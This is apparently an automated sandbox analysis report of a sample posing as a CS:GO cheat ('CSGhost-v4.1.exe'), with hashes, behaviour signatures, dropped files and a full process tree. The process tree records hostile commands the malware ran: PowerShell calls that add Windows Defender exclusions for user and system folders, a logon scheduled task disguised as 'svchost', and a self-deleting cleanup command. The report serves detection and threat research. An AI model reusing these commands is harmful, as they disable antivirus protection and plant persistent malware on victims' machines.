Overview

overview

10

Static

static

10

Bird.exe

windows7-x64

10

Bird.exe

windows10-2004-x64

10

CSGO FREE HACK.exe

windows7-x64

10

CSGO FREE HACK.exe

windows10-2004-x64

10

CSGO FREEHACK.exe

windows7-x64

3

CSGO FREEHACK.exe

windows10-2004-x64

3

CSGhost-v4.1.exe

windows7-x64

8

CSGhost-v4.1.exe

windows10-2004-x64

10

Install.exe

windows7-x64

10

Install.exe

windows10-2004-x64

10

Installer.exe

windows7-x64

10

Installer.exe

windows10-2004-x64

10

Installer2.exe

windows7-x64

10

Installer2.exe

windows10-2004-x64

10

Kiddions Mod MENU.exe

windows7-x64

7

Kiddions Mod MENU.exe

windows10-2004-x64

7

Minecraft_v4.5.exe

windows7-x64

10

Minecraft_v4.5.exe

windows10-2004-x64

10

Vape Crack.exe

windows7-x64

10

Vape Crack.exe

windows10-2004-x64

10

Vape Patch.exe

windows7-x64

10

Vape Patch.exe

windows10-2004-x64

10

Vape_V4.exe

windows7-x64

10

Vape_V4.exe

windows10-2004-x64

10

launcher.exe

windows7-x64

10

launcher.exe

windows10-2004-x64

10

nixware crack.exe

windows7-x64

3

nixware crack.exe

windows10-2004-x64

3

Analysis

  • max time kernel
    144s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    09-11-2024 16:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CSGhost-v4.1.exe

  • Size

    158KB

  • MD5

    2dd7cacaab277d37dace276fc3c98f32

  • SHA1

    7227f97f9539a7620ef4ff6687394bce9220d972

  • SHA256

    2340f7976585cd113520b33eb51c6b57e37c6bad2fba29a48b8c7e8e784a2491

  • SHA512

    df73194f1adeff94942ff01e4161a836b642d02a5da564a0b8388936b1a1c7e0018779e49cfef38e8523c032d31bf34dc0fce7fad3185a57d5a20a616eb46520

  • SSDEEP

    3072:mSKJbzx0eTzNRvcF9mOQEUzJw4xE+vn84Tt4dVmfyu5ytLNoH:pWztTz709mVEUzvydVk5ytLN

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 12 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe
    "C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
      "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:2776
    • C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Windows\system32\cmd.exe
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2720
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:2084
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:2584
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of AdjustPrivilegeToken
          PID:1940
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
          C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2452
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3040
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1112
          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1632
            • C:\Windows\system32\cmd.exe
              "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2900
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2936
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1892
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1460
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1784
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2160
              • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
                C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                PID:680
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
                  8⤵
                    PID:280
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
                      9⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:1536
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:976
                    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                      9⤵
                      • Executes dropped EXE
                      PID:2460
                      • C:\Windows\system32\cmd.exe
                        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        10⤵
                          PID:1316
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                            11⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of AdjustPrivilegeToken
                            PID:776
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                            11⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2556
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                            11⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1652
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                            11⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2100
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                          10⤵
                          • Loads dropped DLL
                          PID:988
                          • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
                            C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                            11⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2976
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
                              12⤵
                                PID:2404
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
                                  13⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2916
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                                12⤵
                                  PID:2196
                                  • C:\Windows\system32\choice.exe
                                    choice /C Y /N /D Y /T 3
                                    13⤵
                                      PID:2080
                            • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                              "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                              9⤵
                              • Executes dropped EXE
                              PID:2148
                              • C:\Windows\system32\cmd.exe
                                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                10⤵
                                  PID:2312
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                    11⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2328
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                    11⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2788
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                    11⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2784
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                    11⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1100
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                  10⤵
                                  • Loads dropped DLL
                                  PID:2708
                                  • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
                                    C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                    11⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1128
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
                                      12⤵
                                        PID:2864
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
                                          13⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2736
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                                        12⤵
                                          PID:2432
                                          • C:\Windows\system32\choice.exe
                                            choice /C Y /N /D Y /T 3
                                            13⤵
                                              PID:2164
                                    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                      9⤵
                                      • Executes dropped EXE
                                      PID:1632
                                      • C:\Windows\system32\cmd.exe
                                        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                        10⤵
                                          PID:1988
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                            11⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1616
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                            11⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2200
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                            11⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2476
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                            11⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2152
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                          10⤵
                                          • Loads dropped DLL
                                          PID:2460
                                          • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
                                            C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                            11⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2508
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
                                              12⤵
                                                PID:2816
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
                                                  13⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:2124
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                                                12⤵
                                                  PID:2464
                                                  • C:\Windows\system32\choice.exe
                                                    choice /C Y /N /D Y /T 3
                                                    13⤵
                                                      PID:2768
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                                            8⤵
                                              PID:2660
                                              • C:\Windows\system32\choice.exe
                                                choice /C Y /N /D Y /T 3
                                                9⤵
                                                  PID:2640
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                                          5⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1088
                                          • C:\Windows\system32\choice.exe
                                            choice /C Y /N /D Y /T 3
                                            6⤵
                                              PID:2904

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    929a2212220e9b880c5e949576014004

                                    SHA1

                                    dc936f254917a52bda0ee7bfec4c9c61628504b8

                                    SHA256

                                    0a7c8aeea55c9f23a296e9be56ad3063f945a456788680d4e15af58831cb4a59

                                    SHA512

                                    d693de9ee33cbdf87e42620536497ca64be7eebb7d621deb74daeafef23c5a7cc683cbc22b00e6fd7f84a174e7e887f5c1b35bac56b2fb33ae7c77e9543cf501

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    88f0d219c19c0f974b513dff80e88bbe

                                    SHA1

                                    1e6ccf25389c37e5fef8cc2319ce466b9d09b465

                                    SHA256

                                    e3e0e3d9bb8c72e28d1bc4d2820be7aae7647cb3820a76c8fdd1d45614096155

                                    SHA512

                                    26b730fddaceb4a317f68cbe387331bab03e7e3e10786e8cad0983a512d9159c5610c14e72f83135451a4b4f9d5fc1cb5362b09d552a6fedddb37b3f0931732c

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\CabCEB6.tmp
                                    Filesize

                                    70KB

                                    MD5

                                    49aebf8cbd62d92ac215b2923fb1b9f5

                                    SHA1

                                    1723be06719828dda65ad804298d0431f6aff976

                                    SHA256

                                    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                    SHA512

                                    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\TarCEB9.tmp
                                    Filesize

                                    181KB

                                    MD5

                                    4ea6026cf93ec6338144661bf1202cd1

                                    SHA1

                                    a1dec9044f750ad887935a01430bf49322fbdcb7

                                    SHA256

                                    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                    SHA512

                                    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
                                    Filesize

                                    39KB

                                    MD5

                                    a5bdb33481f19152370a4cbe486c1790

                                    SHA1

                                    d657448275485590e0b141bc3965f03650636e47

                                    SHA256

                                    ead94cc9778691b1388fc31b4a9ec1bb1220073508e80228bd85d325612d7075

                                    SHA512

                                    61612206312611b2026e8a38a4b1f18a24fb8605e75bd2fe26d4132a6a4ab890e4096d8eb96e5f2cfc312885451f156ef6e56bd00943e1745ad532bbfef3d0fe

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
                                    Filesize

                                    14KB

                                    MD5

                                    0c0195c48b6b8582fa6f6373032118da

                                    SHA1

                                    d25340ae8e92a6d29f599fef426a2bc1b5217299

                                    SHA256

                                    11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

                                    SHA512

                                    ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                    Filesize

                                    7KB

                                    MD5

                                    0dc0c432c76b5f23dec8f2da05da574f

                                    SHA1

                                    f93bb2cd4e300c5b7808c8aeb3d80797975ccfb0

                                    SHA256

                                    9d4ed1c19be402033e56523eb9a78a928102c689c82e27ab926ea6f2206e8fee

                                    SHA512

                                    5cc10e825cc53878e89b44e9ae01973c194955364992cd769aaac49ecf5af392b01f051e2fe800c617a391555aa385ea56a2ae4d565287c1a5e42af93f1812e9

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                    Filesize

                                    7KB

                                    MD5

                                    fe7691d2ecc05d98b3d4431abdc103c9

                                    SHA1

                                    96d666b1984784b067cfec45c066fdfb44f15409

                                    SHA256

                                    733a2010bc40d1bd02beb0480a22f5ece50583388780d8ae9ff404d417f34562

                                    SHA512

                                    4fcce183c510af40b5a75f55e7fdaeeeed0f00d95494329c33d6dd07f45acdedce1f51fdbd03b2054f87341d1221884dfe363239a3144613d8d1257848d3198e

                                    Download Submit

                                  • \Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
                                    Filesize

                                    99KB

                                    MD5

                                    56a7502c31f7e8b9df6026cca035d000

                                    SHA1

                                    a2e1dea33bec675650559a148f78f831a0c11886

                                    SHA256

                                    b6dffd0fcf337c0da1439857c9bb162c1965641e644163f702f29bc84fd04b9f

                                    SHA512

                                    82b2331d087d0543ef5004d59206f618db7ad91225b4720b302c7da2263972cadebc8412a3fa85262c993bfab5247cfa4cfea01d80ea4cbeb59c0ef7fbebe499

                                    Download Submit

                                  • \Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
                                    Filesize

                                    47KB

                                    MD5

                                    164b5610097d3c76850d0d3cc1f3892a

                                    SHA1

                                    31c439c5dab3c0a98ca827a07e17f903b8aae2f9

                                    SHA256

                                    e922d71f77061f2ce7100d4f1aea67b8477d7e9cd9e40a10a411868cf93bbc52

                                    SHA512

                                    fa832118802c3b4107911a541e8498a6c3acd1fba50c3e0a115899d521a77e293325397296d00353abd6d10965dc74b8fea1ee58dafa6547f05c76bd6e64450e

                                    Download Submit

                                  • memory/680-80-0x000000013F7F0000-0x000000013F7FE000-memory.dmp

                                    Filesize

                                    56KB

                                    Download

                                  • memory/976-88-0x000000013F350000-0x000000013F356000-memory.dmp

                                    Filesize

                                    24KB

                                    Download

                                  • memory/1128-315-0x000000013F230000-0x000000013F23E000-memory.dmp

                                    Filesize

                                    56KB

                                    Download

                                  • memory/1632-53-0x000000013F930000-0x000000013F940000-memory.dmp

                                    Filesize

                                    64KB

                                    Download

                                  • memory/1632-377-0x000000013FAD0000-0x000000013FAE0000-memory.dmp

                                    Filesize

                                    64KB

                                    Download

                                  • memory/2084-29-0x000000001B690000-0x000000001B972000-memory.dmp

                                    Filesize

                                    2.9MB

                                    Download

                                  • memory/2084-30-0x0000000001E70000-0x0000000001E78000-memory.dmp

                                    Filesize

                                    32KB

                                    Download

                                  • memory/2128-1-0x00000000748E0000-0x0000000074E8B000-memory.dmp

                                    Filesize

                                    5.7MB

                                    Download

                                  • memory/2128-0-0x00000000748E1000-0x00000000748E2000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/2128-15-0x00000000748E0000-0x0000000074E8B000-memory.dmp

                                    Filesize

                                    5.7MB

                                    Download

                                  • memory/2128-2-0x00000000748E0000-0x0000000074E8B000-memory.dmp

                                    Filesize

                                    5.7MB

                                    Download

                                  • memory/2148-289-0x000000013F7B0000-0x000000013F7C0000-memory.dmp

                                    Filesize

                                    64KB

                                    Download

                                  • memory/2188-17-0x000000013FA00000-0x000000013FA10000-memory.dmp

                                    Filesize

                                    64KB

                                    Download

                                  • memory/2188-16-0x000007FEF5E93000-0x000007FEF5E94000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/2452-46-0x000000013FCC0000-0x000000013FCCE000-memory.dmp

                                    Filesize

                                    56KB

                                    Download

                                  • memory/2460-201-0x000000013F1E0000-0x000000013F1F0000-memory.dmp

                                    Filesize

                                    64KB

                                    Download

                                  • memory/2508-396-0x000000013F720000-0x000000013F72E000-memory.dmp

                                    Filesize

                                    56KB

                                    Download

                                  • memory/2720-23-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

                                    Filesize

                                    32KB

                                    Download

                                  • memory/2720-22-0x000000001B810000-0x000000001BAF2000-memory.dmp

                                    Filesize

                                    2.9MB

                                    Download

                                  • memory/2936-59-0x00000000021D0000-0x00000000021D8000-memory.dmp

                                    Filesize

                                    32KB

                                    Download

                                  • memory/2976-227-0x000000013FFE0000-0x000000013FFEE000-memory.dmp

                                    Filesize

                                    56KB

                                    Download